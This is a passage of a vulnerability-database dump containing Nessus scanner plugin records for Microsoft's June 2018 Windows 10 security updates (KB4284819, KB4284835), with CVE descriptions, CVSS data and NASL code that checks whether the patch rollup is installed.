(CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8221)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - An Elevation of Privilege vulnerability exists when\n Cortana retrieves data from user input services without\n consideration for status. An attacker who successfully\n exploited the vulnerability could execute commands with\n elevated permissions. (CVE-2018-8140)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. 
The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. 
(CVE-2018-8227, CVE-2018-8229)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8111,\n CVE-2018-8236)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. 
a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. (CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). 
Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. 
(CVE-2018-8208, CVE-2018-8214)", "edition": 21, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "title": "KB4284819: Windows 10 Version 1709 and Windows Server Version 1709 June 2018 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8226", "CVE-2018-8218", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8140", "CVE-2018-8111", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-8225", "CVE-2018-0871", "CVE-2018-8175"], "modified": "2018-06-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_JUN_4284819.NASL", "href": "https://www.tenable.com/plugins/nessus/110485", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110485);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0871\",\n \"CVE-2018-0978\",\n \"CVE-2018-0982\",\n \"CVE-2018-1036\",\n \"CVE-2018-1040\",\n \"CVE-2018-8111\",\n \"CVE-2018-8113\",\n \"CVE-2018-8121\",\n \"CVE-2018-8140\",\n \"CVE-2018-8169\",\n \"CVE-2018-8175\",\n \"CVE-2018-8201\",\n \"CVE-2018-8205\",\n \"CVE-2018-8207\",\n \"CVE-2018-8208\",\n \"CVE-2018-8209\",\n \"CVE-2018-8210\",\n \"CVE-2018-8211\",\n \"CVE-2018-8212\",\n \"CVE-2018-8213\",\n \"CVE-2018-8214\",\n \"CVE-2018-8215\",\n \"CVE-2018-8218\",\n \"CVE-2018-8219\",\n \"CVE-2018-8221\",\n \"CVE-2018-8225\",\n \"CVE-2018-8226\",\n \"CVE-2018-8227\",\n \"CVE-2018-8229\",\n \"CVE-2018-8231\",\n \"CVE-2018-8234\",\n \"CVE-2018-8235\",\n \"CVE-2018-8236\",\n \"CVE-2018-8239\",\n \"CVE-2018-8251\",\n \"CVE-2018-8267\"\n );\n script_bugtraq_id(\n 104326,\n 104328,\n 104331,\n 104333,\n 104335,\n 104336,\n 104338,\n 104339,\n 104340,\n 104343,\n 104353,\n 104354,\n 104356,\n 104359,\n 104360,\n 104361,\n 104364,\n 104365,\n 104368,\n 104369,\n 104373,\n 104379,\n 104380,\n 104382,\n 104389,\n 104391,\n 104392,\n 104393,\n 104394,\n 104395,\n 104398,\n 104401,\n 104402,\n 104404,\n 104406,\n 104407\n );\n script_xref(name:\"MSKB\", value:\"4284819\");\n script_xref(name:\"MSFT\", value:\"MS18-4284819\");\n\n script_name(english:\"KB4284819: Windows 10 Version 1709 and Windows Server Version 1709 June 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4284819.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An 
elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2018-8218)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An denial of service vulnerability exists when Windows\n NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n An attacker who successfully exploited the vulnerability\n could cause a denial of service. (CVE-2018-8175)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8221)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - An Elevation of Privilege vulnerability exists when\n Cortana retrieves data from user input services without\n consideration for status. An attacker who successfully\n exploited the vulnerability could execute commands with\n elevated permissions. (CVE-2018-8140)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. 
An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. 
The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8227, CVE-2018-8229)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8111,\n CVE-2018-8236)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. 
This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. (CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. 
The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. 
(CVE-2018-8208, CVE-2018-8214)\");\n # https://support.microsoft.com/en-us/help/4284819/windows-10-update-kb4284819\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?21a2fb0a\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4284819.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8231\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-06\";\nkbs = make_list('4284819');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"06_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4284819])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:14", "description": "The remote Windows host is missing security update 4284835.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. 
(CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An denial of service vulnerability exists when Windows\n NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n An attacker who successfully exploited the vulnerability\n could cause a denial of service. (CVE-2018-8175)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. 
(CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8221)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - An Elevation of Privilege vulnerability exists when\n Cortana retrieves data from user input services without\n consideration for status. An attacker who successfully\n exploited the vulnerability could execute commands with\n elevated permissions. (CVE-2018-8140)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. 
An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8233)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. 
(CVE-2018-8227, CVE-2018-8229)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8110,\n CVE-2018-8236)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. 
(CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. 
An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)", "edition": 21, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "title": "KB4284835: Windows 10 Version 1803 and Windows Server Version 1803 June 2018 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-8233", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8110", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8140", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-8225", "CVE-2018-0871", "CVE-2018-8175"], "modified": "2018-06-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_JUN_4284835.NASL", "href": "https://www.tenable.com/plugins/nessus/110487", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
